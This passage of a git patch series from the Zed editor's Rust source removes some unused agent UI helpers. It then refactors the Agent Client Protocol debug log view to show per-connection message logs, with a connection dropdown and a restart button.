focus: bool, - workspace: Entity, - thread_store: Entity, - prompt_store: Option>, - window: &mut Window, - cx: &mut App, - ) -> InlineAssistId { - let buffer = editor.read(cx).buffer().clone(); - { - let snapshot = buffer.read(cx).read(cx); - range.start = range.start.bias_left(&snapshot); - range.end = range.end.bias_right(&snapshot); - } - - let project = workspace.read(cx).project().downgrade(); - - let assist_id = self - .batch_assist( - editor, - workspace.downgrade(), - project, - thread_store, - prompt_store, - Some(initial_prompt), - window, - &[range], - None, - initial_transaction_id, - cx, - ) - .expect("batch_assist returns an id if there's only one range"); - - if focus { - self.focus_assist(assist_id, window, cx); - } - - assist_id - } - fn insert_assist_blocks( &self, editor: &Entity, diff --git a/crates/agent_ui/src/inline_prompt_editor.rs b/crates/agent_ui/src/inline_prompt_editor.rs index 58a67d2578dd50..4683561528323a 100644 --- a/crates/agent_ui/src/inline_prompt_editor.rs +++ b/crates/agent_ui/src/inline_prompt_editor.rs @@ -1541,26 +1541,6 @@ pub enum CodegenStatus { Error(anyhow::Error), } -/// This is just CodegenStatus without the anyhow::Error, which causes a lifetime issue for rendering the Cancel button. -#[derive(Copy, Clone)] -pub enum CancelButtonState { - Idle, - Pending, - Done, - Error, -} - -impl Into for &CodegenStatus { - fn into(self) -> CancelButtonState { - match self { - CodegenStatus::Idle => CancelButtonState::Idle, - CodegenStatus::Pending => CancelButtonState::Pending, - CodegenStatus::Done => CancelButtonState::Done, - CodegenStatus::Error(_) => CancelButtonState::Error, - } - } -} - #[derive(Copy, Clone)] pub enum GenerationMode { Generate, diff --git a/crates/agent_ui/src/mention_set.rs b/crates/agent_ui/src/mention_set.rs index 6b552610cf42a6..f62181c9f3d3e8 100644 --- a/crates/agent_ui/src/mention_set.rs +++ b/crates/agent_ui/src/mention_set.rs @@ -186,11 +186,6 @@ impl MentionSet { self.mentions.drain() } - #[cfg(test)] - pub fn has_thread_store(&self) -> bool { - self.thread_store.is_some() - } - pub fn confirm_mention_completion( &mut self, crease_text: SharedString, diff --git a/crates/agent_ui/src/message_editor.rs b/crates/agent_ui/src/message_editor.rs index 213ce4e88c9172..401c282201d84f 100644 --- a/crates/agent_ui/src/message_editor.rs +++ b/crates/agent_ui/src/message_editor.rs @@ -35,7 +35,7 @@ use rope::Point; use settings::Settings; use std::{fmt::Write, ops::Range, rc::Rc, sync::Arc}; use theme_settings::ThemeSettings; -use ui::{ContextMenu, Disclosure, ElevationIndex, prelude::*}; +use ui::{ContextMenu, prelude::*}; use util::paths::PathStyle; use util::{ResultExt, debug_panic}; use workspace::{CollaboratorId, Workspace}; @@ -1295,22 +1295,6 @@ impl MessageEditor { .detach(); } - /// Inserts code snippets as creases into the editor. - /// Each tuple contains (code_text, crease_title). - pub fn insert_code_creases( - &mut self, - creases: Vec<(String, String)>, - window: &mut Window, - cx: &mut Context, - ) { - self.editor.update(cx, |editor, cx| { - editor.insert("\n", window, cx); - }); - for (text, crease_title) in creases { - self.insert_crease_impl(text, crease_title, IconName::TextSnippet, true, window, cx); - } - } - pub fn insert_branch_diff_crease(&mut self, window: &mut Window, cx: &mut Context) { let Some(workspace) = self.workspace.upgrade() else { return; @@ -1391,70 +1375,6 @@ impl MessageEditor { .detach_and_log_err(cx); } - fn insert_crease_impl( - &mut self, - text: String, - title: String, - icon: IconName, - add_trailing_newline: bool, - window: &mut Window, - cx: &mut Context, - ) { - use editor::display_map::{Crease, FoldPlaceholder}; - use multi_buffer::MultiBufferRow; - use rope::Point; - - self.editor.update(cx, |editor, cx| { - let point = editor - .selections - .newest::(&editor.display_snapshot(cx)) - .head(); - let start_row = MultiBufferRow(point.row); - - editor.insert(&text, window, cx); - - let snapshot = editor.buffer().read(cx).snapshot(cx); - let anchor_before = snapshot.anchor_after(point); - let anchor_after = editor - .selections - .newest_anchor() - .head() - .bias_left(&snapshot); - - if add_trailing_newline { - editor.insert("\n", window, cx); - } - - let fold_placeholder = FoldPlaceholder { - render: Arc::new({ - let title = title.clone(); - move |_fold_id, _fold_range, _cx| { - Button::new("crease", title.clone()) - .layer(ElevationIndex::ElevatedSurface) - .start_icon(Icon::new(icon)) - .into_any_element() - } - }), - merge_adjacent: false, - ..Default::default() - }; - - let crease = Crease::inline( - anchor_before..anchor_after, - fold_placeholder, - |row, is_folded, fold, _window, _cx| { - Disclosure::new(("crease-toggle", row.0 as u64), !is_folded) - .toggle_state(is_folded) - .on_click(move |_e, window, cx| fold(!is_folded, window, cx)) - .into_any_element() - }, - |_, _, _, _| gpui::Empty.into_any(), - ); - editor.insert_creases(vec![crease], cx); - editor.fold_at(start_row, window, cx); - }); - } - pub fn insert_selections(&mut self, window: &mut Window, cx: &mut Context) { let editor = self.editor.read(cx); let editor_buffer = editor.buffer().read(cx); From c050c389c37bee31f079afa210766c0457ace9b1 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Fri, 24 Apr 2026 17:53:14 +0200 Subject: [PATCH 024/231] acp: Improve ACP debug view (#54769) Adds a dropdown to the ACP logs which lets you specify which agent connection to look at. Also adds a button to restart the connection. image Release Notes: - N/A --- Cargo.lock | 5 +- crates/acp_tools/Cargo.toml | 4 +- crates/acp_tools/src/acp_tools.rs | 878 +++++++++--------- crates/agent_servers/Cargo.toml | 3 +- crates/agent_servers/src/acp.rs | 203 +++- crates/agent_servers/src/agent_servers.rs | 5 +- crates/agent_ui/src/agent_connection_store.rs | 27 + crates/agent_ui/src/agent_ui.rs | 3 +- 8 files changed, 643 insertions(+), 485 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 5ae684b0a5c336..f825e9f2bc60c5 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -52,16 +52,16 @@ name = "acp_tools" version = "0.1.0" dependencies = [ "agent-client-protocol", + "agent_servers", + "agent_ui", "collections", "gpui", "language", - "log", "markdown", "project", "serde", "serde_json", "settings", - "smol", "theme_settings", "ui", "util", @@ -277,7 +277,6 @@ name = "agent_servers" version = "0.1.0" dependencies = [ "acp_thread", - "acp_tools", "action_log", "agent-client-protocol", "anyhow", diff --git a/crates/acp_tools/Cargo.toml b/crates/acp_tools/Cargo.toml index 2d7162b9dec538..2613d39962b02f 100644 --- a/crates/acp_tools/Cargo.toml +++ b/crates/acp_tools/Cargo.toml @@ -18,15 +18,15 @@ test-support = ["workspace/test-support"] [dependencies] agent-client-protocol.workspace = true +agent_servers.workspace = true +agent_ui.workspace = true collections.workspace = true gpui.workspace = true language.workspace= true -log.workspace = true markdown.workspace = true project.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true settings.workspace = true theme_settings.workspace = true ui.workspace = true diff --git a/crates/acp_tools/src/acp_tools.rs b/crates/acp_tools/src/acp_tools.rs index 86ae365c9f8500..8801379578fa36 100644 --- a/crates/acp_tools/src/acp_tools.rs +++ b/crates/acp_tools/src/acp_tools.rs @@ -1,139 +1,46 @@ -use std::{ - collections::{HashSet, VecDeque}, - fmt::Display, - sync::Arc, -}; +use std::{collections::HashSet, fmt::Display, rc::Rc, sync::Arc}; use agent_client_protocol::schema as acp; +use agent_servers::{AcpDebugMessage, AcpDebugMessageContent, AcpDebugMessageDirection}; +use agent_ui::agent_connection_store::AgentConnectionStatus; +use agent_ui::{Agent, AgentConnectionStore, AgentPanel}; use collections::HashMap; use gpui::{ - App, Empty, Entity, EventEmitter, FocusHandle, Focusable, Global, ListAlignment, ListState, - StyleRefinement, Subscription, Task, TextStyleRefinement, Window, actions, list, prelude::*, + App, Empty, Entity, EventEmitter, FocusHandle, Focusable, ListAlignment, ListState, + SharedString, StyleRefinement, Subscription, Task, TextStyleRefinement, WeakEntity, Window, + actions, list, prelude::*, }; use language::LanguageRegistry; use markdown::{CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; use project::{AgentId, Project}; use settings::Settings; use theme_settings::ThemeSettings; -use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*}; +use ui::{ + ContextMenu, CopyButton, DropdownMenu, DropdownStyle, IconPosition, Tooltip, WithScrollbar, + prelude::*, +}; use util::ResultExt as _; use workspace::{ Item, ItemHandle, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace, }; -#[derive(Clone, Copy, PartialEq, Eq)] -pub enum StreamMessageDirection { - Incoming, - Outgoing, - /// Lines captured from the agent's stderr. These are not part of the - /// JSON-RPC protocol, but agents often emit useful diagnostics there. - Stderr, -} - -#[derive(Clone)] -pub enum StreamMessageContent { - Request { - id: acp::RequestId, - method: Arc, - params: Option, - }, - Response { - id: acp::RequestId, - result: Result, acp::Error>, - }, - Notification { - method: Arc, - params: Option, - }, - /// A raw stderr line from the agent process. - Stderr { line: Arc }, -} - -#[derive(Clone)] -pub struct StreamMessage { - pub direction: StreamMessageDirection, - pub message: StreamMessageContent, -} - -impl StreamMessage { - /// Build a `StreamMessage` from a raw line captured off the transport. - /// - /// For `Stderr`, the line is wrapped as-is (no JSON parsing). For - /// `Incoming`/`Outgoing`, the line is parsed as JSON-RPC; returns `None` - /// if it doesn't look like a valid JSON-RPC message. - pub fn from_raw_line(direction: StreamMessageDirection, line: &str) -> Option { - if direction == StreamMessageDirection::Stderr { - return Some(StreamMessage { - direction, - message: StreamMessageContent::Stderr { - line: Arc::from(line), - }, - }); - } - - let value: serde_json::Value = serde_json::from_str(line).ok()?; - let obj = value.as_object()?; - - let parsed_id = obj - .get("id") - .map(|raw| serde_json::from_value::(raw.clone())); - - let message = if let Some(method) = obj.get("method").and_then(|m| m.as_str()) { - match parsed_id { - Some(Ok(id)) => StreamMessageContent::Request { - id, - method: method.into(), - params: obj.get("params").cloned(), - }, - Some(Err(err)) => { - log::warn!("Skipping JSON-RPC message with unparsable id: {err}"); - return None; - } - None => StreamMessageContent::Notification { - method: method.into(), - params: obj.get("params").cloned(), - }, - } - } else if let Some(parsed_id) = parsed_id { - let id = match parsed_id { - Ok(id) => id, - Err(err) => { - log::warn!("Skipping JSON-RPC response with unparsable id: {err}"); - return None; - } - }; - if let Some(error) = obj.get("error") { - let acp_err = - serde_json::from_value::(error.clone()).unwrap_or_else(|err| { - log::warn!("Failed to deserialize ACP error: {err}"); - acp::Error::internal_error().data(error.to_string()) - }); - StreamMessageContent::Response { - id, - result: Err(acp_err), - } - } else { - StreamMessageContent::Response { - id, - result: Ok(obj.get("result").cloned()), - } - } - } else { - return None; - }; - - Some(StreamMessage { direction, message }) - } -} - actions!(dev, [OpenAcpLogs]); pub fn init(cx: &mut App) { cx.observe_new( |workspace: &mut Workspace, _window, _cx: &mut Context| { workspace.register_action(|workspace, _: &OpenAcpLogs, window, cx| { - let acp_tools = - Box::new(cx.new(|cx| AcpTools::new(workspace.project().clone(), cx))); + let connection_store = workspace + .panel::(cx) + .map(|panel| panel.read(cx).connection_store().clone()); + let acp_tools = Box::new(cx.new(|cx| { + AcpTools::new( + workspace.weak_handle(), + workspace.project().clone(), + connection_store, + cx, + ) + })); workspace.add_item_to_active_pane(acp_tools, None, true, window, cx); }); }, @@ -141,177 +48,21 @@ pub fn init(cx: &mut App) { .detach(); } -struct GlobalAcpConnectionRegistry(Entity); - -impl Global for GlobalAcpConnectionRegistry {} - -/// A raw line captured from the transport (or from stderr), tagged with -/// direction. Deserialization into [`StreamMessage`] happens on the -/// registry's foreground task so the ring buffer can be replayed to late -/// subscribers. -struct RawStreamLine { - direction: StreamMessageDirection, - line: Arc, -} - -/// Handle to an ACP connection's log tap. Passed back by -/// [`AcpConnectionRegistry::set_active_connection`] so that the connection -/// can publish transport and stderr lines without knowing anything about -/// the logs panel's channel. -/// -/// Every line is buffered into the registry's ring, so opening the ACP logs -/// panel after the fact still shows history. The steady-state cost is -/// negligible compared to the JSON-RPC serialization that already happened -/// to produce the line. -#[derive(Clone)] -pub struct AcpLogTap { - sender: smol::channel::Sender, -} - -impl AcpLogTap { - fn emit(&self, direction: StreamMessageDirection, line: &str) { - self.sender - .try_send(RawStreamLine { - direction, - line: Arc::from(line), - }) - .log_err(); - } - - /// Record a line read from the agent's stdout. - pub fn emit_incoming(&self, line: &str) { - self.emit(StreamMessageDirection::Incoming, line); - } - - /// Record a line written to the agent's stdin. - pub fn emit_outgoing(&self, line: &str) { - self.emit(StreamMessageDirection::Outgoing, line); - } - - /// Record a line read from the agent's stderr. - pub fn emit_stderr(&self, line: &str) { - self.emit(StreamMessageDirection::Stderr, line); - } -} - -/// Maximum number of messages retained in the registry's backlog. -/// -/// Mirrors `MAX_STORED_LOG_ENTRIES` in the LSP log store, so that opening the -/// ACP logs panel after a session has been running for a while still shows -/// meaningful history. -const MAX_BACKLOG_MESSAGES: usize = 2000; - -#[derive(Default)] -pub struct AcpConnectionRegistry { - active_agent_id: Option, - generation: u64, - /// Bounded ring buffer of every message observed on the current connection. - /// When a new connection is set, this is cleared. - backlog: VecDeque, - subscribers: Vec>, - _broadcast_task: Option>, -} - -impl AcpConnectionRegistry { - pub fn default_global(cx: &mut App) -> Entity { - if cx.has_global::() { - cx.global::().0.clone() - } else { - let registry = cx.new(|_cx| AcpConnectionRegistry::default()); - cx.set_global(GlobalAcpConnectionRegistry(registry.clone())); - registry - } - } - - /// Register a new active connection and return an [`AcpLogTap`] that - /// the connection should hand to its transport + stderr readers. - /// - /// The tap begins capturing immediately so that opening the ACP logs - /// panel after something has already gone wrong still shows the - /// leading history (up to [`MAX_BACKLOG_MESSAGES`]). - pub fn set_active_connection( - &mut self, - agent_id: AgentId, - cx: &mut Context, - ) -> AcpLogTap { - let (sender, raw_rx) = smol::channel::unbounded::(); - let tap = AcpLogTap { sender }; - - self.active_agent_id = Some(agent_id); - self.generation += 1; - self.backlog.clear(); - self.subscribers.clear(); - - self._broadcast_task = Some(cx.spawn(async move |this, cx| { - while let Ok(raw) = raw_rx.recv().await { - this.update(cx, |this, _cx| { - let Some(message) = StreamMessage::from_raw_line(raw.direction, &raw.line) - else { - return; - }; - - if this.backlog.len() == MAX_BACKLOG_MESSAGES { - this.backlog.pop_front(); - } - this.backlog.push_back(message.clone()); - - this.subscribers.retain(|sender| !sender.is_closed()); - for sender in &this.subscribers { - sender.try_send(message.clone()).log_err(); - } - }) - .log_err(); - } - - // The transport closed — clear state so observers (e.g. the ACP - // logs tab) can transition back to the disconnected state. - this.update(cx, |this, cx| { - this.active_agent_id = None; - this.subscribers.clear(); - cx.notify(); - }) - .log_err(); - })); - - cx.notify(); - tap - } - - /// Clear the retained message history for the current connection and force - /// watchers to resubscribe so their local correlation state is reset too. - pub fn clear_messages(&mut self, cx: &mut Context) { - self.backlog.clear(); - self.generation += 1; - self.subscribers.clear(); - cx.notify(); - } - - /// Subscribe to messages on the current connection. - /// - /// Returns the existing backlog (already-observed messages) together with - /// a receiver for new messages. The caller is responsible for flushing the - /// backlog into its local state before draining the receiver, so that no - /// messages are dropped between the snapshot and live subscription. - pub fn subscribe(&mut self) -> (Vec, smol::channel::Receiver) { - let backlog = self.backlog.iter().cloned().collect(); - let (sender, receiver) = smol::channel::unbounded(); - self.subscribers.push(sender); - (backlog, receiver) - } -} - struct AcpTools { + workspace: WeakEntity, project: Entity, focus_handle: FocusHandle, expanded: HashSet, - watched_connection: Option, - connection_registry: Entity, - _subscription: Subscription, + watched_connections: HashMap, + selected_connection: Option, + connection_store: Option>, + _workspace_subscription: Option, + _connection_store_subscription: Option, } struct WatchedConnection { agent_id: AgentId, - generation: u64, + connection: Rc, messages: Vec, list_state: ListState, incoming_request_methods: HashMap>, @@ -320,156 +71,278 @@ struct WatchedConnection { } impl AcpTools { - fn new(project: Entity, cx: &mut Context) -> Self { - let connection_registry = AcpConnectionRegistry::default_global(cx); - - let subscription = cx.observe(&connection_registry, |this, _, cx| { - this.update_connection(cx); - cx.notify(); + fn new( + workspace: WeakEntity, + project: Entity, + connection_store: Option>, + cx: &mut Context, + ) -> Self { + let workspace_subscription = workspace.upgrade().map(|workspace| { + cx.observe(&workspace, |this, _, cx| { + this.update_connection_store(cx); + }) }); - let mut this = Self { + let mut acp_tools = Self { + workspace, project, focus_handle: cx.focus_handle(), expanded: HashSet::default(), - watched_connection: None, - connection_registry, - _subscription: subscription, + watched_connections: HashMap::default(), + selected_connection: None, + connection_store: None, + _workspace_subscription: workspace_subscription, + _connection_store_subscription: None, }; - this.update_connection(cx); - this + acp_tools.set_connection_store(connection_store, cx); + acp_tools } - fn update_connection(&mut self, cx: &mut Context) { - let (generation, agent_id) = { - let registry = self.connection_registry.read(cx); - (registry.generation, registry.active_agent_id.clone()) - }; - - let Some(agent_id) = agent_id else { - self.watched_connection = None; - self.expanded.clear(); + fn set_connection_store( + &mut self, + connection_store: Option>, + cx: &mut Context, + ) { + if self.connection_store == connection_store { return; - }; - - if let Some(watched) = self.watched_connection.as_ref() { - if watched.generation == generation { - return; - } } - self.expanded.clear(); + self.connection_store = connection_store.clone(); + self._connection_store_subscription = connection_store.as_ref().map(|connection_store| { + cx.observe(connection_store, |this, _, cx| { + this.refresh_connections(cx); + }) + }); + self.refresh_connections(cx); + } + + fn update_connection_store(&mut self, cx: &mut Context) { + let connection_store = self.workspace.upgrade().and_then(|workspace| { + workspace + .read(cx) + .panel::(cx) + .map(|panel| panel.read(cx).connection_store().clone()) + }); + self.set_connection_store(connection_store, cx); + } - let (backlog, messages_rx) = self - .connection_registry - .update(cx, |registry, _cx| registry.subscribe()); + fn refresh_connections(&mut self, cx: &mut Context) { + let active_connections = self + .connection_store + .as_ref() + .map(|connection_store| connection_store.read(cx).active_acp_connections(cx)) + .unwrap_or_default(); + + self.watched_connections + .retain(|agent_id, watched_connection| { + active_connections.iter().any(|active_connection| { + active_connection.agent_id == *agent_id + && Rc::ptr_eq( + &active_connection.connection, + &watched_connection.connection, + ) + }) + }); - let task = cx.spawn(async move |this, cx| { - while let Ok(message) = messages_rx.recv().await { - this.update(cx, |this, cx| { - this.push_stream_message(message, cx); + for active_connection in active_connections { + if self + .watched_connections + .get(&active_connection.agent_id) + .is_some_and(|watched_connection| { + Rc::ptr_eq( + &active_connection.connection, + &watched_connection.connection, + ) }) - .log_err(); + { + continue; } - }); - self.watched_connection = Some(WatchedConnection { - agent_id, - generation, - messages: vec![], - list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), - incoming_request_methods: HashMap::default(), - outgoing_request_methods: HashMap::default(), - _task: task, - }); + let (backlog, messages_rx) = active_connection.connection.subscribe_debug_messages(); + let agent_id = active_connection.agent_id.clone(); + let task = cx.spawn({ + let agent_id = agent_id.clone(); + async move |this, cx| { + while let Ok(message) = messages_rx.recv().await { + this.update(cx, |this, cx| { + this.push_stream_message(&agent_id, message, cx); + }) + .log_err(); + } + } + }); - for message in backlog { - self.push_stream_message(message, cx); + let mut watched_connection = WatchedConnection { + agent_id: agent_id.clone(), + messages: Vec::new(), + list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), + connection: active_connection.connection.clone(), + incoming_request_methods: HashMap::default(), + outgoing_request_methods: HashMap::default(), + _task: task, + }; + + for message in backlog { + push_stream_message_for_connection( + &mut watched_connection, + &self.project, + message, + cx, + ); + } + + self.watched_connections + .insert(agent_id, watched_connection); } + + self.selected_connection = self + .selected_connection + .clone() + .filter(|agent_id| self.should_keep_selected_connection(agent_id, cx)) + .or_else(|| self.watched_connections.keys().next().cloned()); + self.expanded.clear(); + cx.notify(); + } + + fn should_keep_selected_connection(&self, agent_id: &AgentId, cx: &App) -> bool { + self.watched_connections.contains_key(agent_id) + || self + .connection_store + .as_ref() + .is_some_and(|connection_store| { + connection_store + .read(cx) + .connection_status(&Agent::from(agent_id.clone()), cx) + != AgentConnectionStatus::Disconnected + }) + } + + fn select_connection(&mut self, agent_id: Option, cx: &mut Context) { + if self.selected_connection == agent_id { + return; + } + + self.selected_connection = agent_id; + self.expanded.clear(); + cx.notify(); } - fn push_stream_message(&mut self, stream_message: StreamMessage, cx: &mut Context) { - let Some(connection) = self.watched_connection.as_mut() else { + fn restart_selected_connection(&mut self, cx: &mut Context) { + let Some(agent_id) = self.selected_connection.clone() else { + return; + }; + let Some(workspace) = self.workspace.upgrade() else { return; }; - let language_registry = self.project.read(cx).languages().clone(); - let index = connection.messages.len(); - - let (request_id, method, message_type, params) = match stream_message.message { - StreamMessageContent::Request { id, method, params } => { - let method_map = match stream_message.direction { - StreamMessageDirection::Incoming => &mut connection.incoming_request_methods, - StreamMessageDirection::Outgoing => &mut connection.outgoing_request_methods, - // Stderr lines never carry request/response correlation. - StreamMessageDirection::Stderr => return, - }; - method_map.insert(id.clone(), method.clone()); - (Some(id), method.into(), MessageType::Request, Ok(params)) - } - StreamMessageContent::Response { id, result } => { - let method_map = match stream_message.direction { - StreamMessageDirection::Incoming => &mut connection.outgoing_request_methods, - StreamMessageDirection::Outgoing => &mut connection.incoming_request_methods, - StreamMessageDirection::Stderr => return, - }; + workspace.update(cx, |workspace, cx| { + let Some(panel) = workspace.panel::(cx) else { + return; + }; - if let Some(method) = method_map.remove(&id) { - (Some(id), method.into(), MessageType::Response, result) - } else { - ( - Some(id), - "[unrecognized response]".into(), - MessageType::Response, - result, - ) - } - } - StreamMessageContent::Notification { method, params } => { - (None, method.into(), MessageType::Notification, Ok(params)) - } - StreamMessageContent::Stderr { line } => { - // Stderr is rendered as plain text inline with JSON-RPC traffic, - // using `stderr` as the pseudo-method name so it shows up in the - // header the same way real methods do. + let fs = workspace.app_state().fs.clone(); + let (thread_store, connection_store) = { + let panel = panel.read(cx); ( - None, - "stderr".into(), - MessageType::Stderr, - Ok(Some(serde_json::Value::String(line.to_string()))), + panel.thread_store().clone(), + panel.connection_store().clone(), ) + }; + let agent = Agent::from(agent_id); + let server = agent.server(fs, thread_store); + connection_store.update(cx, |store, cx| { + store.restart_connection(agent, server, cx); + }); + }); + } + + fn selected_connection_status(&self, cx: &App) -> Option { + let agent = Agent::from(self.selected_connection.clone()?); + Some( + self.connection_store + .as_ref()? + .read(cx) + .connection_status(&agent, cx), + ) + } + + fn selected_watched_connection(&self) -> Option<&WatchedConnection> { + let selected_connection = self.selected_connection.as_ref()?; + self.watched_connections.get(selected_connection) + } + + fn selected_watched_connection_mut(&mut self) -> Option<&mut WatchedConnection> { + let selected_connection = self.selected_connection.clone()?; + self.watched_connections.get_mut(&selected_connection) + } + + fn connection_menu_entries(&self) -> Vec { + let mut entries: Vec<_> = self + .watched_connections + .values() + .map(|connection| connection.agent_id.0.clone()) + .collect(); + entries.sort(); + entries + } + + fn selected_connection_label(&self) -> SharedString { + self.selected_connection + .as_ref() + .map(|agent_id| agent_id.0.clone()) + .unwrap_or_else(|| SharedString::from("No connection selected")) + } + + fn connection_menu(&self, window: &mut Window, cx: &mut Context) -> Entity { + let entries = self.connection_menu_entries(); + let selected_connection = self.selected_connection.clone(); + let acp_tools = cx.entity().downgrade(); + + ContextMenu::build(window, cx, move |mut menu, _window, _cx| { + if entries.is_empty() { + return menu.entry("No active connections", None, |_, _| {}); } - }; - let message = WatchedConnectionMessage { - name: method, - message_type, - request_id, - direction: stream_message.direction, - collapsed_params_md: match params.as_ref() { - Ok(params) => params + for entry in &entries { + let label = entry.clone(); + let is_selected = selected_connection .as_ref() - .map(|params| collapsed_params_md(params, &language_registry, cx)), - Err(err) => { - if let Ok(err) = &serde_json::to_value(err) { - Some(collapsed_params_md(&err, &language_registry, cx)) - } else { - None - } - } - }, + .is_some_and(|agent_id| agent_id.0.as_ref() == label.as_ref()); + let acp_tools = acp_tools.clone(); + menu = menu.toggleable_entry( + label.clone(), + is_selected, + IconPosition::Start, + None, + move |_window, cx| { + acp_tools + .update(cx, |this, cx| { + this.select_connection(Some(AgentId(label.clone())), cx); + }) + .ok(); + }, + ); + } - expanded_params_md: None, - params, - }; + menu + }) + } - connection.messages.push(message); - connection.list_state.splice(index..index, 1); + fn push_stream_message( + &mut self, + agent_id: &AgentId, + stream_message: AcpDebugMessage, + cx: &mut Context, + ) { + let Some(connection) = self.watched_connections.get_mut(agent_id) else { + return; + }; + push_stream_message_for_connection(connection, &self.project, stream_message, cx); cx.notify(); } fn serialize_observed_messages(&self) -> Option { - let connection = self.watched_connection.as_ref()?; + let connection = self.selected_watched_connection()?; let messages: Vec = connection .messages @@ -482,9 +355,9 @@ impl AcpTools { }; Some(serde_json::json!({ "_direction": match message.direction { - StreamMessageDirection::Incoming => "incoming", - StreamMessageDirection::Outgoing => "outgoing", - StreamMessageDirection::Stderr => "stderr", + AcpDebugMessageDirection::Incoming => "incoming", + AcpDebugMessageDirection::Outgoing => "outgoing", + AcpDebugMessageDirection::Stderr => "stderr", }, "_type": message.message_type.to_string().to_lowercase(), "id": message.request_id, @@ -498,7 +371,7 @@ impl AcpTools { } fn clear_messages(&mut self, cx: &mut Context) { - if let Some(connection) = self.watched_connection.as_mut() { + if let Some(connection) = self.selected_watched_connection_mut() { connection.messages.clear(); connection.list_state.reset(0); connection.incoming_request_methods.clear(); @@ -514,7 +387,7 @@ impl AcpTools { window: &mut Window, cx: &mut Context, ) -> AnyElement { - let Some(connection) = self.watched_connection.as_ref() else { + let Some(connection) = self.selected_watched_connection() else { return Empty.into_any(); }; @@ -556,25 +429,26 @@ impl AcpTools { this.expanded.remove(&index); } else { this.expanded.insert(index); - let Some(connection) = &mut this.watched_connection else { + let project = this.project.clone(); + let Some(connection) = this.selected_watched_connection_mut() else { return; }; let Some(message) = connection.messages.get_mut(index) else { return; }; - message.expanded(this.project.read(cx).languages().clone(), cx); + message.expanded(project.read(cx).languages().clone(), cx); connection.list_state.scroll_to_reveal_item(index); } cx.notify() })) .child(match message.direction { - StreamMessageDirection::Incoming => Icon::new(IconName::ArrowDown) + AcpDebugMessageDirection::Incoming => Icon::new(IconName::ArrowDown) .color(Color::Error) .size(IconSize::Small), - StreamMessageDirection::Outgoing => Icon::new(IconName::ArrowUp) + AcpDebugMessageDirection::Outgoing => Icon::new(IconName::ArrowUp) .color(Color::Success) .size(IconSize::Small), - StreamMessageDirection::Stderr => Icon::new(IconName::Warning) + AcpDebugMessageDirection::Stderr => Icon::new(IconName::Warning) .color(Color::Warning) .size(IconSize::Small), }) @@ -645,10 +519,79 @@ impl AcpTools { } } +fn push_stream_message_for_connection( + connection: &mut WatchedConnection, + project: &Entity, + stream_message: AcpDebugMessage, + cx: &mut App, +) { + let language_registry = project.read(cx).languages().clone(); + let index = connection.messages.len(); + + let (request_id, method, message_type, params) = match stream_message.message { + AcpDebugMessageContent::Request { id, method, params } => { + let method_map = match stream_message.direction { + AcpDebugMessageDirection::Incoming => &mut connection.incoming_request_methods, + AcpDebugMessageDirection::Outgoing => &mut connection.outgoing_request_methods, + AcpDebugMessageDirection::Stderr => return, + }; + + method_map.insert(id.clone(), method.clone()); + (Some(id), method.into(), MessageType::Request, Ok(params)) + } + AcpDebugMessageContent::Response { id, result } => { + let method_map = match stream_message.direction { + AcpDebugMessageDirection::Incoming => &mut connection.outgoing_request_methods, + AcpDebugMessageDirection::Outgoing => &mut connection.incoming_request_methods, + AcpDebugMessageDirection::Stderr => return, + }; + + if let Some(method) = method_map.remove(&id) { + (Some(id), method.into(), MessageType::Response, result) + } else { + ( + Some(id), + "[unrecognized response]".into(), + MessageType::Response, + result, + ) + } + } + AcpDebugMessageContent::Notification { method, params } => { + (None, method.into(), MessageType::Notification, Ok(params)) + } + AcpDebugMessageContent::Stderr { line } => ( + None, + "stderr".into(), + MessageType::Stderr, + Ok(Some(serde_json::Value::String(line.to_string()))), + ), + }; + + let message = WatchedConnectionMessage { + name: method, + message_type, + request_id, + direction: stream_message.direction, + collapsed_params_md: match ¶ms { + Ok(Some(params)) => Some(collapsed_params_md(params, &language_registry, cx)), + Ok(None) => None, + Err(err) => serde_json::to_value(err) + .ok() + .map(|err| collapsed_params_md(&err, &language_registry, cx)), + }, + expanded_params_md: None, + params, + }; + + connection.messages.push(message); + connection.list_state.splice(index..index, 1); +} + struct WatchedConnectionMessage { name: SharedString, request_id: Option, - direction: StreamMessageDirection, + direction: AcpDebugMessageDirection, message_type: MessageType, params: Result, acp::Error>, collapsed_params_md: Option>, @@ -732,8 +675,7 @@ impl Item for AcpTools { fn tab_content_text(&self, _detail: usize, _cx: &App) -> ui::SharedString { format!( "ACP: {}", - self.watched_connection - .as_ref() + self.selected_watched_connection() .map_or("Disconnected", |connection| connection.agent_id.0.as_ref()) ) .into() @@ -752,11 +694,67 @@ impl Focusable for AcpTools { impl Render for AcpTools { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let has_messages = self + .selected_watched_connection() + .is_some_and(|connection| !connection.messages.is_empty()); + let can_restart = matches!( + self.selected_connection_status(cx), + Some(status) if status != AgentConnectionStatus::Connecting + ); + let copied_messages = self.serialize_observed_messages().unwrap_or_default(); + v_flex() .track_focus(&self.focus_handle) .size_full() .bg(cx.theme().colors().editor_background) - .child(match self.watched_connection.as_ref() { + .child( + h_flex() + .w_full() + .px_3() + .py_2() + .items_center() + .justify_between() + .gap_2() + .border_b_1() + .border_color(cx.theme().colors().border) + .child( + DropdownMenu::new( + "acp-connection-selector", + self.selected_connection_label(), + self.connection_menu(window, cx), + ) + .style(DropdownStyle::Subtle) + .disabled(self.watched_connections.is_empty()), + ) + .child( + h_flex() + .gap_2() + .child( + IconButton::new("restart_connection", IconName::RotateCw) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Restart Connection")) + .disabled(!can_restart) + .on_click(cx.listener(|this, _, _window, cx| { + this.restart_selected_connection(cx); + })), + ) + .child( + CopyButton::new("copy-all-messages", copied_messages) + .tooltip_label("Copy All Messages") + .disabled(!has_messages), + ) + .child( + IconButton::new("clear_messages", IconName::Trash) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Clear Messages")) + .disabled(!has_messages) + .on_click(cx.listener(|this, _, _window, cx| { + this.clear_messages(cx); + })), + ), + ), + ) + .child(match self.selected_watched_connection() 